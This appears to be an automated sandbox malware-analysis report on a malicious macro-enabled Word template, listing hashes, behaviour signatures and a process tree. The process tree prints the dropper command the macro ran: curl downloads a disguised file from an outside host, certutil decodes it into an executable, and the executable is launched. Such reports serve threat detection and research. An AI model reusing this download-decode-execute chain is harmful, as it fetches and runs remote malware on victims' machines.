Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10/04/2024, 10:22

General

  • Target

    383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm

  • Size

    16KB

  • MD5

    0fb9bb549173482cfe4faa67ac22a960

  • SHA1

    aad49c13d5b80c4b9022889cc9d56bbc04d0f496

  • SHA256

    383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f

  • SHA512

    ff07db920400bb41a62e7da0f4d54a46fd3b2f56a70789b8f9d8868f93784b6468dd656cea7367e14add124db346896d44619fb041d957658bdc298dd06b43e4

  • SSDEEP

    384:tmtNHjUtc6WGaLmrHzVHRQTtxcdV0pjMNJSOTesmB3Dl:qZpG6mrZKpOMp9OTehP

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\AppData\Local & curl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg & certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe & Msdllupdate.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Windows\SysWOW64\certutil.exe
        certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe
        3⤵
          PID:2648
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
          PID:2512

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

              Filesize

              20KB

              MD5

              371e6518d4fa391adfc8c0b29f6dbce3

              SHA1

              49f6e37c8007c7946f7da7e4179b249656b36eae

              SHA256

              09a8b390641bdcdc89dab63a11d583699e7a47673a0240e2aa5d01500461ea5e

              SHA512

              f7423f489112feca68d974836190b6d547af00b63d29787f55dc42214b76d3173c9c403ec60e117f520b10a9745c7014e1971c69e8a9a57fd08df0248b5aa5be

            • memory/2296-0-0x000000002F1F1000-0x000000002F1F2000-memory.dmp

              Filesize

              4KB

            • memory/2296-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

              Filesize

              64KB

            • memory/2296-2-0x0000000070A9D000-0x0000000070AA8000-memory.dmp

              Filesize

              44KB

            • memory/2296-10-0x0000000004EE0000-0x0000000004FE0000-memory.dmp

              Filesize

              1024KB

            • memory/2296-15-0x0000000004EE0000-0x0000000004FE0000-memory.dmp

              Filesize

              1024KB

            • memory/2296-19-0x0000000004EE0000-0x0000000004FE0000-memory.dmp

              Filesize

              1024KB

            • memory/2296-26-0x0000000070A9D000-0x0000000070AA8000-memory.dmp

              Filesize

              44KB

            • memory/2296-27-0x0000000004EE0000-0x0000000004FE0000-memory.dmp

              Filesize

              1024KB

            • memory/2296-45-0x000000005FFF0000-0x0000000060000000-memory.dmp

              Filesize

              64KB